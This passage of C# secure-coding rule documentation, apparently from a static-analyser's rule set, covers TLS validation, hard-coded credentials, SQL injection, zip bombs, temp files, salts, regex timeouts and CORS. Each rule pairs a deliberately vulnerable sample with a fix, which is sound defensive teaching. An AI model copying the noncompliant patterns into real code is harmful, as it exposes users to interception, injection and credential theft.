  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing it on the command line. It is common to write it to the process’s standard input, or to give the path to a file containing the information.
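A minimal sketch of validating a command line argument before use; the expectation of a single port-number argument is purely illustrative:

```csharp
using System;

public static class ArgumentValidation
{
    // Illustrative check: accept only a TCP port number in the valid range.
    public static bool TryParsePort(string arg, out int port) =>
        int.TryParse(arg, out port) && port >= 1 && port <= 65535;
}

class Program
{
    static void Main(string[] args)
    {
        // Validate before use: expect exactly one numeric argument in a known range.
        if (args.Length != 1 || !ArgumentValidation.TryParsePort(args[0], out int port))
        {
            Console.Error.WriteLine("usage: myapp <port 1-65535>");
            Environment.Exit(1);
        }
        Console.WriteLine($"Listening on validated port {port}");
    }
}
```

Rejecting anything outside the expected shape up front keeps unvalidated attacker-controlled data out of the rest of the program.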

Sensitive Code Example

namespace MyNamespace
{
    class Program
    {
        static void Main(string[] args) // Sensitive if there is a reference to "args" in the method.
        {
            string myarg = args[0];
            // ...
        }
    }
}

See

csharpsquid:S4830

This vulnerability makes it possible for an encrypted communication to be intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in .NET

Code examples

In the following example, the callback change impacts all HTTP requests made by the application.

Certificate validation is disabled by overriding ServerCertificateValidationCallback with an implementation that unconditionally returns true. It is highly recommended to keep the default validation behavior.

Noncompliant code example

using System.Net;
using System.Net.Http;

public static void connect()
{
    ServicePointManager.ServerCertificateValidationCallback +=
        (sender, certificate, chain, errors) => {
            return true; // Noncompliant
        };

    HttpClient httpClient = new HttpClient();
    HttpResponseMessage response = httpClient.GetAsync("https://example.com").Result;
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.
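Where adding the certificate to the machine trust store is not an option, another pattern is to keep the default validation and additionally pin the expected certificate, for instance by its thumbprint. A minimal sketch; the thumbprint value is a placeholder and the class name is illustrative:

```csharp
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;

public static class CertificatePinning
{
    // Placeholder: replace with the thumbprint of the certificate you actually trust.
    private const string ExpectedThumbprint = "0000000000000000000000000000000000000000";

    // Matches the RemoteCertificateValidationCallback delegate signature.
    public static bool Validate(object sender, X509Certificate certificate,
                                X509Chain chain, SslPolicyErrors errors)
    {
        // Accept only when default validation passed AND the certificate is the pinned one.
        return errors == SslPolicyErrors.None
            && certificate is X509Certificate2 cert2
            && cert2.Thumbprint == ExpectedThumbprint;
    }
}
```

Unlike the noncompliant callback above, this one never weakens validation: it can only reject certificates that the default checks would have accepted.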

Resources

Standards

csharpsquid:S4834

This rule is deprecated, and will eventually be removed.

The access control of an application must be properly implemented in order to restrict access to resources to authorized entities; otherwise, this could lead to vulnerabilities.

Granting correct permissions to users, applications, groups or roles, and defining the permissions required to access a resource, is sensitive and must therefore be done with care. For instance, it is obvious that only users with administrator privileges should be authorized to add or remove the administrator permission of another user.

Ask Yourself Whether

  • Permissions granted to an entity (user, application) allow access to information or functionalities not needed by that entity.
  • Privileges are easily acquired (e.g. based on the location of the user or the type of device used, defined by third parties, not requiring approval, …​).
  • Inherited permissions, default permissions, or the absence of privileges (e.g. an anonymous user) authorize access to a protected resource.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

At minimum, an access control system should:

  • Use a well-defined access control model like RBAC or ACL.
  • Review entities' permissions regularly to remove permissions that are no longer needed.
  • Respect the principle of least privilege ("an entity has access only to the information and resources that are necessary for its legitimate purpose").

Sensitive Code Example

using System.Threading;
using System.Security.Permissions;
using System.Security.Principal;
using System.IdentityModel.Tokens;

class SecurityPrincipalDemo
{
    class MyIdentity : IIdentity // Sensitive, custom IIdentity implementations should be reviewed
    {
        // ...
    }

    class MyPrincipal : IPrincipal // Sensitive, custom IPrincipal implementations should be reviewed
    {
        // ...
    }
    [System.Security.Permissions.PrincipalPermission(SecurityAction.Demand, Role = "Administrators")] // Sensitive. The access restrictions enforced by this attribute should be reviewed.
    static void CheckAdministrator()
    {
        WindowsIdentity MyIdentity = WindowsIdentity.GetCurrent(); // Sensitive
        HttpContext.User = ...; // Sensitive: review all reference (set and get) to System.Web HttpContext.User
        AppDomain domain = AppDomain.CurrentDomain;
        domain.SetPrincipalPolicy(PrincipalPolicy.WindowsPrincipal); // Sensitive
        MyIdentity identity = new MyIdentity(); // Sensitive
        MyPrincipal MyPrincipal = new MyPrincipal(MyIdentity); // Sensitive
        Thread.CurrentPrincipal = MyPrincipal; // Sensitive
        domain.SetThreadPrincipal(MyPrincipal); // Sensitive

        // All instantiation of PrincipalPermission should be reviewed.
        PrincipalPermission principalPerm = new PrincipalPermission(null, "Administrators"); // Sensitive
        principalPerm.Demand();

        SecurityTokenHandler handler = ...;
        // Sensitive: this creates an identity.
        ReadOnlyCollection<ClaimsIdentity> identities = handler.ValidateToken(…);
    }

     // Sensitive: review how this function uses the identity and principal.
    void modifyPrincipal(MyIdentity identity, MyPrincipal principal)
    {
        // ...
    }
}

See

csharpsquid:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file that contains a few kilobytes of compressed data but expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress highly redundant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed sizes of each archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data; in general, the compression ratio of most legitimate archives is between 1 and 3.
  • Define and control a threshold for the maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if that number exceeds a predefined threshold. In particular, it is not recommended to recursively expand archives (an entry of an archive can itself be an archive).

Sensitive Code Example

using var zipToOpen = new FileStream(@"ZipBomb.zip", FileMode.Open);
using var archive = new ZipArchive(zipToOpen, ZipArchiveMode.Read);
foreach (ZipArchiveEntry entry in archive.Entries)
{
  entry.ExtractToFile("./output_onlyfortesting.txt", true); // Sensitive
}

Compliant Solution

int THRESHOLD_ENTRIES = 10000;
int THRESHOLD_SIZE = 1000000000; // 1 GB
double THRESHOLD_RATIO = 10;
int totalSizeArchive = 0;
int totalEntryArchive = 0;

using var zipToOpen = new FileStream(@"ZipBomb.zip", FileMode.Open);
using var archive = new ZipArchive(zipToOpen, ZipArchiveMode.Read);
foreach (ZipArchiveEntry entry in archive.Entries)
{
  totalEntryArchive++;

  using (Stream st = entry.Open())
  {
    byte[] buffer = new byte[1024];
    int totalSizeEntry = 0;
    int numBytesRead = 0;

    do
    {
      numBytesRead = st.Read(buffer, 0, 1024);
      totalSizeEntry += numBytesRead;
      totalSizeArchive += numBytesRead;
      double compressionRatio = totalSizeEntry / (double)entry.CompressedLength; // cast to double to avoid integer division

      if(compressionRatio > THRESHOLD_RATIO) {
        // ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
        break;
      }
    }
    while (numBytesRead > 0);
  }

  if(totalSizeArchive > THRESHOLD_SIZE) {
      // the uncompressed data size is too much for the application resource capacity
      break;
  }

  if(totalEntryArchive > THRESHOLD_ENTRIES) {
      // too many entries in this archive; can lead to inode exhaustion on the system
      break;
  }
}

See

csharpsquid:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.
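
As a sketch of the first practices above, credentials can be resolved from the process environment at runtime instead of being compiled into the binary (the variable names DB_USER/DB_PASSWORD and the helper below are illustrative, not part of the rule):

```csharp
using System;

static class CredentialSource
{
    // Resolve a credential from the process environment at runtime;
    // nothing secret ends up in the source code or the compiled binary.
    public static string Require(string name)
    {
        var value = Environment.GetEnvironmentVariable(name);
        if (string.IsNullOrEmpty(value))
            throw new InvalidOperationException($"Missing required credential: {name}");
        return value;
    }
}

// Usage: the connection string is assembled from values injected by the
// deployment environment (or a secrets manager) rather than hard-coded.
// string connectionString =
//     $"Server=db;User Id={CredentialSource.Require("DB_USER")};" +
//     $"Password={CredentialSource.Require("DB_PASSWORD")};";
```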

Sensitive Code Example

string username = "admin";
string password = "Admin123"; // Sensitive
string usernamePassword  = "user=admin&password=Admin123"; // Sensitive
string url = "scheme://user:Admin123@domain.com"; // Sensitive

Compliant Solution

string username = "admin";
string password = GetEncryptedPassword();
string usernamePassword = string.Format("user={0}&password={1}", GetEncryptedUsername(), GetEncryptedPassword());
string url = $"scheme://{username}:{password}@domain.com";

string url2 = "http://guest:guest@domain.com"; // Compliant
const string Password_Property = "custom.password"; // Compliant

Exceptions

  • Issue is not raised when URI username and password are the same.
  • Issue is not raised when searched pattern is found in variable name and value.

See

csharpsquid:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure, as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease attackers' chances of successfully leaking data or stealing credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that the use of the http protocol is being deprecated by major web browsers.

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

var urlHttp = "http://example.com";                 // Noncompliant
var urlFtp = "ftp://anonymous@example.com";         // Noncompliant
var urlTelnet = "telnet://anonymous@example.com";   // Noncompliant
using var smtp = new SmtpClient("host", 25); // Noncompliant, EnableSsl is not set
using var telnet = new MyTelnet.Client("host", port); // Noncompliant, rule raises Security Hotspot on any member containing "Telnet"

Compliant Solution

var urlHttps = "https://example.com";
var urlSftp = "sftp://anonymous@example.com";
var urlSsh = "ssh://anonymous@example.com";
using var smtp = new SmtpClient("host", 25) { EnableSsl = true };
using var ssh = new MySsh.Client("host", port);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

csharpsquid:S5693

Rejecting requests with a significant content length is a good practice for controlling network traffic intensity, and thus resource consumption, in order to prevent DoS attacks.

Ask Yourself Whether

  • Size limits are not defined for the different resources of the web application.
  • The web application is not protected by rate-limiting features.
  • The web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • less than or equal to 8 MB for file uploads.
    • less than or equal to 2 MB for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

using Microsoft.AspNetCore.Mvc;

public class MyController : Controller
{
    [HttpPost]
    [DisableRequestSizeLimit] // Sensitive: No size limit
    [RequestSizeLimit(10000000)] // Sensitive: 10MB is more than the recommended limit of 8MB
    public IActionResult PostRequest(Model model)
    {
    // ...
    }

    [HttpPost]
    [RequestFormLimits(MultipartBodyLengthLimit = 10000000)] // Sensitive: 10MB is more than the recommended limit of 8MB
    public IActionResult MultipartFormRequest(Model model)
    {
    // ...
    }
}

In Web.config:

<configuration>
    <system.web>
        <httpRuntime maxRequestLength="81920" executionTimeout="3600" />
        <!-- Sensitive: maxRequestLength is expressed in KB, so 81920KB = 80MB -->
    </system.web>
    <system.webServer>
        <security>
            <requestFiltering>
                <requestLimits maxAllowedContentLength="83886080" />
                <!-- Sensitive: maxAllowedContentLength is expressed in bytes, so 83886080B = 80MB -->
            </requestFiltering>
        </security>
    </system.webServer>
</configuration>

Compliant Solution

using Microsoft.AspNetCore.Mvc;

public class MyController : Controller
{
    [HttpPost]
    [RequestSizeLimit(8000000)] // Compliant: 8MB
    public IActionResult PostRequest(Model model)
    {
    // ...
    }

    [HttpPost]
    [RequestFormLimits(MultipartBodyLengthLimit = 8000000)] // Compliant: 8MB
    public IActionResult MultipartFormRequest(Model model)
    {
    // ...
    }
}

In Web.config:

<configuration>
    <system.web>
        <httpRuntime maxRequestLength="8192" executionTimeout="3600" />
        <!-- Compliant: maxRequestLength is expressed in KB, so 8192KB = 8MB -->
    </system.web>
    <system.webServer>
        <security>
            <requestFiltering>
                <requestLimits maxAllowedContentLength="8388608" />
                <!-- Compliant: maxAllowedContentLength is expressed in bytes, so 8388608B = 8MB -->
            </requestFiltering>
        </security>
    </system.webServer>
</configuration>

See

csharpsquid:S2077

Formatted SQL queries can be difficult to maintain and debug, and they can increase the risk of SQL injection when untrusted values are concatenated into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649); its goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use parameterized queries, prepared statements, or stored procedures, and bind variables to SQL query parameters.

Sensitive Code Example

public void Foo(DbContext context, string query, string param)
{
    string sensitiveQuery = string.Concat(query, param);
    context.Database.ExecuteSqlCommand(sensitiveQuery); // Sensitive
    context.Query<User>().FromSql(sensitiveQuery); // Sensitive

    context.Database.ExecuteSqlCommand($"SELECT * FROM mytable WHERE mycol={param}"); // Sensitive, the FormattableString is evaluated and converted to RawSqlString
    string formattedQuery = $"SELECT * FROM mytable WHERE mycol={param}";
    context.Database.ExecuteSqlCommand(formattedQuery); // Sensitive, the FormattableString has already been evaluated, so it won't be converted to a parametrized query.
}

public void Bar(SqlConnection connection, string param)
{
    SqlCommand command;
    string sensitiveQuery = string.Format("INSERT INTO Users (name) VALUES (\"{0}\")", param);
    command = new SqlCommand(sensitiveQuery); // Sensitive

    command.CommandText = sensitiveQuery; // Sensitive

    SqlDataAdapter adapter;
    adapter = new SqlDataAdapter(sensitiveQuery, connection); // Sensitive
}

Compliant Solution

public void Foo(DbContext context, string query, string param)
{
    context.Database.ExecuteSqlCommand("SELECT * FROM mytable WHERE mycol=@p0", param); // Compliant, it's a parametrized safe query
}

See

csharpsquid:S6640

Using unsafe code blocks can lead to unintended security or stability risks.

unsafe code blocks allow developers to use features such as pointers, fixed buffers, function calls through pointers and manual memory management. Such features may be necessary for interoperability with native libraries, as these often require pointers. It may also increase performance in some critical areas, as certain bounds checks are not executed in an unsafe context.

unsafe code blocks aren’t necessarily dangerous; however, the contents of such blocks are not verified by the Common Language Runtime. Therefore, it is up to the programmer to ensure that no bugs are introduced through manual memory management or casting. If this is not done correctly, those bugs can lead to memory corruption vulnerabilities such as stack overflows. Because of these security and stability risks, unsafe code blocks should be used with caution.

Ask Yourself Whether

  • Any pointers or fixed buffers are declared within the unsafe code block.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

Unless absolutely necessary, do not use unsafe code blocks. If unsafe is used to increase performance, then the Span and Memory APIs may serve a similar purpose in a safe context.

If it is not possible to remove the code block, then it should be kept as short as possible. Doing so reduces risk, as there is less code that can potentially introduce new bugs. Within the unsafe code block, make sure that:

  • All type casts are correct.
  • Memory is correctly allocated and then released.
  • Array accesses can never go out of bounds.

Sensitive Code Example

public unsafe int SubarraySum(int[] array, int start, int end)  // Sensitive
{
    var sum = 0;

    // Skip array bound checks for extra performance
    fixed (int* firstNumber = array)
    {
        for (int i = start; i < end; i++)
            sum += *(firstNumber + i);
    }

    return sum;
}

Compliant Solution

public int SubarraySum(int[] array, int start, int end)
{
    var sum = 0;

    Span<int> span = array.AsSpan();
    for (int i = start; i < end; i++)
        sum += span[i];

    return sum;
}

See

csharpsquid:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas, like /tmp in Linux-based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see the examples below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP, TMPDIR and TEMP.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP
  • %USERPROFILE%\AppData\Local\Temp

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Out of the box, .NET is missing secure-by-design APIs to create temporary files. To overcome this, one of the following options can be used:

  • Use a dedicated sub-folder with tightly controlled permissions
  • Create temporary files in a publicly writable folder and make sure that:
    • The generated filename is unpredictable.
    • The file is readable and writable only by the creating user ID.
    • The file descriptor is not inherited by child processes.
    • The file is destroyed as soon as it is closed.

Sensitive Code Example

using var writer = new StreamWriter("/tmp/f"); // Sensitive
var tmp = Environment.GetEnvironmentVariable("TMP"); // Sensitive

Compliant Solution

var randomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());

// Creates a new file with write-only, non-inheritable permissions, which is deleted on close.
using var fileStream = new FileStream(randomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose);
using var writer = new StreamWriter(fileStream);

See

csharpsquid:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

using System.IO;

public void Example()
{
    var tempPath = Path.GetTempFileName();  // Noncompliant

    using (var writer = new StreamWriter(tempPath))
    {
        writer.WriteLine("content");
    }
}

Compliant solution

using System.IO;

public void Example()
{
    var randomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());

    using (var fileStream = new FileStream(randomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose))
    using (var writer = new StreamWriter(fileStream))
    {
        writer.WriteLine("content");
    }
}

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Strong security controls

Temporary files can be created using unsafe functions and APIs as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers cannot create a file before them. This translates into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.

Here, the example compliant code uses the Path.GetTempPath and Path.GetRandomFileName functions to generate a unique random file name. The file is then opened with the FileMode.CreateNew option, which ensures the creation fails if the file already exists. The FileShare.None option additionally prevents the file from being opened again by any process. Finally, this code ensures the file is destroyed once the application has finished using it, via the FileOptions.DeleteOnClose option.

Resources

Documentation

  • OWASP - Insecure Temporary File

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions

csharpsquid:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' password and salt pairs might be low, depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using a longer, cryptographically secure salt should be preferred.

How to fix it in .NET

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

using System.Text;
using System.Security.Cryptography;

public static void hash(string password)
{
    var salt = Encoding.UTF8.GetBytes("salty");
    var hashed = new Rfc2898DeriveBytes(password, salt); // Noncompliant
}

Compliant solution

using System.Security.Cryptography;

public static void hash(string password)
{
    var hashed = new Rfc2898DeriveBytes(password, 16);
}

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

In the case of the code sample, the class automatically takes care of generating a secure salt if none is specified.
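
When an API requires the salt to be passed explicitly, it can be generated with a cryptographically secure random generator. The sketch below assumes .NET 6 or later (for RandomNumberGenerator.GetBytes and the static Rfc2898DeriveBytes.Pbkdf2 helper) and uses the 16-byte salt length recommended above; the class and method names are illustrative:

```csharp
using System.Security.Cryptography;

static class SaltedHashing
{
    // Generate a unique, unpredictable 16-byte (128-bit) salt per password.
    public static byte[] NewSalt() => RandomNumberGenerator.GetBytes(16);

    // Derive a 32-byte key from the password and the per-user salt via PBKDF2.
    public static byte[] Hash(string password, byte[] salt) =>
        Rfc2898DeriveBytes.Pbkdf2(password, salt, 100_000, HashAlgorithmName.SHA256, 32);
}
```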

Resources

Standards

  • OWASP - Top 10 2021 - A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt

csharpsquid:S6444

Not specifying a timeout for regular expressions can lead to a Denial-of-Service attack. Pass a timeout when using System.Text.RegularExpressions to process untrusted input because a malicious user might craft a value for which the evaluation lasts excessively long.

Ask Yourself Whether

  • the input passed to the regular expression is untrusted.
  • the regular expression contains patterns vulnerable to catastrophic backtracking.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to specify a matchTimeout when executing a regular expression.
  • Make sure regular expressions are not vulnerable to Denial-of-Service attacks by reviewing the patterns.
  • Consider using a non-backtracking algorithm by specifying RegexOptions.NonBacktracking.

Sensitive Code Example

public void RegexPattern(string input)
{
    var emailPattern = new Regex(".+@.+", RegexOptions.None);
    var isNumber = Regex.IsMatch(input, "[0-9]+");
    var isLetterA = Regex.IsMatch(input, "(a+)+");
}

Compliant Solution

public void RegexPattern(string input)
{
    var emailPattern = new Regex(".+@.+", RegexOptions.None, TimeSpan.FromMilliseconds(100));
    var isNumber = Regex.IsMatch(input, "[0-9]+", RegexOptions.None, TimeSpan.FromMilliseconds(100));
    var isLetterA = Regex.IsMatch(input, "(a+)+", RegexOptions.NonBacktracking); // .Net 7 and above
    AppDomain.CurrentDomain.SetData("REGEX_DEFAULT_MATCH_TIMEOUT", TimeSpan.FromMilliseconds(100)); // process-wide setting
}

See

csharpsquid:S4036

When executing an OS command, unless you specify the full path to the executable, the directories listed in your application’s PATH environment variable will be searched for the executable. That search could leave an opening for an attacker if one of the directories in PATH is under their control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by untrusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

A fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

Process p = new Process();
p.StartInfo.FileName = "binary"; // Sensitive

Compliant Solution

Process p = new Process();
p.StartInfo.FileName = @"C:\Apps\binary.exe"; // Compliant

See

csharpsquid:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive.

The same-origin policy in browsers prevents, by default and for security reasons, a JavaScript frontend from performing a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in its response, called CORS headers, that act like directives for the browser and change the access control policy / relax the same-origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use the * wildcard, nor blindly return the Origin header content without any checks).

Sensitive Code Example

ASP.NET Core MVC:

[HttpGet]
public string Get()
{
    Response.Headers.Add("Access-Control-Allow-Origin", "*"); // Sensitive
    Response.Headers.Add(HeaderNames.AccessControlAllowOrigin, "*"); // Sensitive
    return "content";
}
public void ConfigureServices(IServiceCollection services)
{
    services.AddCors(options =>
    {
        options.AddDefaultPolicy(builder =>
        {
            builder.WithOrigins("*"); // Sensitive
        });

